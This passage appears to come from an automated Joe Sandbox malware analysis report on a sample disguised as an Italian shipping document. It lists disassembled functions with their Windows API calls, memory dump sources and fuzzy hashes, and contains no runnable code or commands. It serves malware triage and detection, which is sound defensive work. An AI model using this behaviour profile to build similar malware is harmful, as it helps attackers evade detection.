                        • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                        • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                        Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: ICMP.DLL$IcmpSendEcho
                        • API String ID: 2574300362-58917771
                        • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                        • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                        • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                        • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                        Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 2574300362-4033151799
                        • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                        • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                        • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                        • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                        Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                        • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                        • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                        • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                        Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 0047950F
                        • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                        • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                        • VariantClear.OLEAUT32(?), ref: 00479650
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Variant$AllocClearCopyInitString
                        • String ID:
                        • API String ID: 2808897238-0
                        • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                        • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                        • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                        • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                        Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                        • __itow.LIBCMT ref: 004699CD
                          • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                        • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                        • __itow.LIBCMT ref: 00469A97
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$__itow
                        • String ID:
                        • API String ID: 3379773720-0
                        • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                        • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                        • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                        • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                        Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00449A4A
                        • ScreenToClient.USER32(?,?), ref: 00449A80
                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$ClientMoveRectScreen
                        • String ID:
                        • API String ID: 3880355969-0
                        • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                        • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                        • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                        • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                        Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                        • String ID:
                        • API String ID: 2782032738-0
                        • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                        • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                        • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                        • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                        Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                        Download Yara Rule
                        APIs
                        • ClientToScreen.USER32(00000000,?), ref: 0044169A
                        • GetWindowRect.USER32(?,?), ref: 00441722
                        • PtInRect.USER32(?,?,?), ref: 00441734
                        • MessageBeep.USER32(00000000), ref: 004417AD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                        • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                        • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                        • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                        Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                        • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                        • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                        • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                        • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                        • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                        Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                        • __isleadbyte_l.LIBCMT ref: 004208A6
                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                        • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                        • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                        • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                        Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(?), ref: 004503C8
                        • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                        • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                        • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Proc$Parent
                        • String ID:
                        • API String ID: 2351499541-0
                        • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                        • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                        • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                        • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                        Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                        Download Yara Rule
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                        • TranslateMessage.USER32(?), ref: 00442B01
                        • DispatchMessageW.USER32(?), ref: 00442B0B
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Message$Peek$DispatchTranslate
                        • String ID:
                        • API String ID: 1795658109-0
                        • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                        • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                        • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                        • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                        Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                        • GetCaretPos.USER32(?), ref: 004743B2
                        • ClientToScreen.USER32(00000000,?), ref: 004743E8
                        • GetForegroundWindow.USER32 ref: 004743EE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                        • String ID:
                        • API String ID: 2759813231-0
                        • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                        • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                        • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                        • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                        Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                        • _wcslen.LIBCMT ref: 00449519
                        • _wcslen.LIBCMT ref: 00449526
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend_wcslen$_wcspbrk
                        • String ID:
                        • API String ID: 2886238975-0
                        • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                        • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                        • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                        • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                        Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __setmode$DebugOutputString_fprintf
                        • String ID:
                        • API String ID: 1792727568-0
                        • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                        • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                        • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                        • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                        Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                        • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
